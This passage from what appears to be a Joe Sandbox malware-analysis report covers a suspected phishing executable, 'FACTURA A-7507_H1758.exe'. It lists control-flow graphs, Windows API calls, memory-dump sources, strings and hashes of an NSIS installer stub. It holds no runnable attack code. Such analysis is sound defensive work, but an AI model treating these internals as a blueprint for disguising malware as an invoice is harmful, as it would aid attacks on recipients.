                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          • Opcode ID: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                                                                                                                                                                          • Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 432 402e41-402e8f GetTickCount GetModuleFileNameW call 405d53 435 402e91-402e96 432->435 436 402e9b-402ec9 call 40617e call 405b7e call 40617e GetFileSize 432->436 437 4030e0-4030e4 435->437 444 402fb9-402fc7 call 402d9f 436->444 445 402ecf-402ee6 436->445 452 403098-40309d 444->452 453 402fcd-402fd0 444->453 446 402ee8 445->446 447 402eea-402ef7 call 403358 445->447 446->447 456 403054-40305c call 402d9f 447->456 457 402efd-402f03 447->457 452->437 454 402fd2-402fea call 40336e call 403358 453->454 455 402ffc-403048 GlobalAlloc call 406677 call 405d82 CreateFileW 453->455 454->452 480 402ff0-402ff6 454->480 482 40304a-40304f 455->482 483 40305e-40308e call 40336e call 4030e7 455->483 456->452 460 402f83-402f87 457->460 461 402f05-402f1d call 405d0e 457->461 464 402f90-402f96 460->464 465 402f89-402f8f call 402d9f 460->465 461->464 479 402f1f-402f26 461->479 471 402f98-402fa6 call 406609 464->471 472 402fa9-402fb3 464->472 465->464 471->472 472->444 472->445 479->464 484 402f28-402f2f 479->484 480->452 480->455 482->437 491 403093-403096 483->491 484->464 486 402f31-402f38 484->486 486->464 488 402f3a-402f41 486->488 488->464 490 402f43-402f63 488->490 490->452 492 402f69-402f6d 490->492 491->452 495 40309f-4030b0 491->495 493 402f75-402f7d 492->493 494 402f6f-402f73 492->494 493->464 496 402f7f-402f81 493->496 494->444 494->493 497 4030b2 495->497 498 4030b8-4030bd 495->498 496->464 497->498 499 4030be-4030c4 498->499 499->499 500 4030c6-4030de call 405d0e 499->500 500->437
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,00000400), ref: 00402E71
                                                                                                                                                                                                                            • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                            • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00402EBA
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA A-7507_H1758.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                          • API String ID: 2803837635-3188765206
                                                                                                                                                                                                                          • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                                                                                                                                                                          • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 503 4061a0-4061ab 504 4061ad-4061bc 503->504 505 4061be-4061d4 503->505 504->505 506 4061da-4061e7 505->506 507 4063ec-4063f2 505->507 506->507 508 4061ed-4061f4 506->508 509 4063f8-406403 507->509 510 4061f9-406206 507->510 508->507 512 406405-406409 call 40617e 509->512 513 40640e-40640f 509->513 510->509 511 40620c-406218 510->511 514 4063d9 511->514 515 40621e-40625a 511->515 512->513 517 4063e7-4063ea 514->517 518 4063db-4063e5 514->518 519 406260-40626b GetVersion 515->519 520 40637a-40637e 515->520 517->507 518->507 521 406285 519->521 522 40626d-406271 519->522 523 406380-406384 520->523 524 4063b3-4063b7 520->524 530 40628c-406293 521->530 522->521 527 406273-406277 522->527 528 406394-4063a1 call 40617e 523->528 529 406386-406392 call 4060c5 523->529 525 4063c6-4063d7 lstrlenW 524->525 526 4063b9-4063c1 call 4061a0 524->526 525->507 526->525 527->521 532 406279-40627d 527->532 541 4063a6-4063af 528->541 529->541 534 406295-406297 530->534 535 406298-40629a 530->535 532->521 537 40627f-406283 532->537 534->535 539 4062d6-4062d9 535->539 540 40629c-4062c2 call 40604b 535->540 537->530 542 4062e9-4062ec 539->542 543 4062db-4062e7 GetSystemDirectoryW 539->543 551 406361-406365 540->551 552 4062c8-4062d1 call 4061a0 540->552 541->525 545 4063b1 541->545 549 406357-406359 542->549 550 4062ee-4062fc GetWindowsDirectoryW 542->550 548 40635b-40635f 543->548 547 406372-406378 call 406412 545->547 547->525 548->547 548->551 549->548 553 4062fe-406308 549->553 550->549 551->547 556 406367-40636d lstrcatW 551->556 552->548 558 406322-406338 SHGetSpecialFolderLocation 553->558 559 40630a-40630d 553->559 556->547 562 406353 558->562 563 40633a-406351 SHGetPathFromIDListW CoTaskMemFree 558->563 559->558 561 40630f-406316 559->561 564 40631e-406320 561->564 562->549 563->548 563->562 564->548 564->558
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,00422708,?,00405314,00422708,00000000,00000000,00000000), ref: 00406263
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004062E1
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004062F4
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040633E
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406349
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405314,00422708,00000000,00000000,00000000), ref: 004063C7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: 868$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-1330423368
                                                                                                                                                                                                                          • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                                                                                                                                                                          • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                                                                                                          • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 765 40596f-405995 call 405c3a 768 405997-4059a9 DeleteFileW 765->768 769 4059ae-4059b5 765->769 770 405b2b-405b2f 768->770 771 4059b7-4059b9 769->771 772 4059c8-4059d8 call 40617e 769->772 773 405ad9-405ade 771->773 774 4059bf-4059c2 771->774 778 4059e7-4059e8 call 405b7e 772->778 779 4059da-4059e5 lstrcatW 772->779 773->770 777 405ae0-405ae3 773->777 774->772 774->773 780 405ae5-405aeb 777->780 781 405aed-405af5 call 4064c1 777->781 783 4059ed-4059f1 778->783 779->783 780->770 781->770 789 405af7-405b0b call 405b32 call 405927 781->789 786 4059f3-4059fb 783->786 787 4059fd-405a03 lstrcatW 783->787 786->787 788 405a08-405a24 lstrlenW FindFirstFileW 786->788 787->788 790 405a2a-405a32 788->790 791 405ace-405ad2 788->791 805 405b23-405b26 call 4052dd 789->805 806 405b0d-405b10 789->806 793 405a52-405a66 call 40617e 790->793 794 405a34-405a3c 790->794 791->773 796 405ad4 791->796 807 405a68-405a70 793->807 808 405a7d-405a88 call 405927 793->808 797 405ab1-405ac1 FindNextFileW 794->797 798 405a3e-405a46 794->798 796->773 797->790 804 405ac7-405ac8 FindClose 797->804 798->793 801 405a48-405a50 798->801 801->793 801->797 804->791 805->770 806->780 809 405b12-405b21 call 4052dd call 40601f 806->809 807->797 810 405a72-405a7b call 40596f 807->810 818 405aa9-405aac call 4052dd 808->818 819 405a8a-405a8d 808->819 809->770 810->797 818->797 820 405aa1-405aa7 819->820 821 405a8f-405a9f call 4052dd call 40601f 819->821 820->797 821->797
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,77233420,77232EE0,00000000), ref: 00405998
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,77233420,77232EE0,00000000), ref: 004059E0
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A03
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A09
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A19
                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$0WB$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-245594271
                                                                                                                                                                                                                          • Opcode ID: fd57f151e8af197d71c8fed8a04c65ccd5cf3bf9c4040b497ebf2cee1ecae55f
                                                                                                                                                                                                                          • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd57f151e8af197d71c8fed8a04c65ccd5cf3bf9c4040b497ebf2cee1ecae55f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                                                                                                                                                                          • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0), ref: 004064CC
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004064D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID: xgB
                                                                                                                                                                                                                          • API String ID: 2295610775-399326502
                                                                                                                                                                                                                          • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                                                                                                                                                                          • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
                                                                                                                                                                                                                          • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 255 403d6a-403d7c 256 403d82-403d88 255->256 257 403ebd-403ecc 255->257 256->257 258 403d8e-403d97 256->258 259 403f1b-403f30 257->259 260 403ece-403f16 GetDlgItem * 2 call 404242 SetClassLongW call 40140b 257->260 261 403d99-403da6 SetWindowPos 258->261 262 403dac-403daf 258->262 264 403f70-403f75 call 40428e 259->264 265 403f32-403f35 259->265 260->259 261->262 267 403db1-403dc3 ShowWindow 262->267 268 403dc9-403dcf 262->268 273 403f7a-403f95 264->273 270 403f37-403f42 call 401389 265->270 271 403f68-403f6a 265->271 267->268 274 403dd1-403de6 DestroyWindow 268->274 275 403deb-403dee 268->275 270->271 292 403f44-403f63 SendMessageW 270->292 271->264 272 40420f 271->272 280 404211-404218 272->280 278 403f97-403f99 call 40140b 273->278 279 403f9e-403fa4 273->279 281 4041ec-4041f2 274->281 283 403df0-403dfc SetWindowLongW 275->283 284 403e01-403e07 275->284 278->279 288 403faa-403fb5 279->288 289 4041cd-4041e6 DestroyWindow EndDialog 279->289 281->272 286 4041f4-4041fa 281->286 283->280 290 403eaa-403eb8 call 4042a9 284->290 291 403e0d-403e1e GetDlgItem 284->291 286->272 294 4041fc-404205 ShowWindow 286->294 288->289 295 403fbb-404008 call 4061a0 call 404242 * 3 GetDlgItem 288->295 289->281 290->280 296 403e20-403e37 SendMessageW IsWindowEnabled 291->296 297 403e3d-403e40 291->297 292->280 294->272 325 404012-40404e ShowWindow KiUserCallbackDispatcher call 404264 EnableWindow 295->325 326 40400a-40400f 295->326 296->272 296->297 300 403e42-403e43 297->300 301 403e45-403e48 297->301 305 403e73-403e78 call 40421b 300->305 302 403e56-403e5b 301->302 303 403e4a-403e50 301->303 306 403e91-403ea4 SendMessageW 302->306 308 403e5d-403e63 302->308 303->306 307 403e52-403e54 303->307 305->290 306->290 307->305 311 403e65-403e6b call 40140b 308->311 312 403e7a-403e83 call 40140b 308->312 321 403e71 311->321 312->290 322 403e85-403e8f 312->322 321->305 322->321 329 404050-404051 325->329 330 404053 325->330 326->325 331 404055-404083 GetSystemMenu EnableMenuItem SendMessageW 329->331 330->331 332 404085-404096 SendMessageW 331->332 333 404098 331->333 334 40409e-4040dc call 404277 call 40617e lstrlenW call 4061a0 SetWindowTextW call 401389 332->334 333->334 334->273 343 4040e2-4040e4 334->343 343->273 344 4040ea-4040ee 343->344 345 4040f0-4040f6 344->345 346 40410d-404121 DestroyWindow 344->346 345->272 347 4040fc-404102 345->347 346->281 348 404127-404154 CreateDialogParamW 346->348 347->273 349 404108 347->349 348->281 350 40415a-4041b1 call 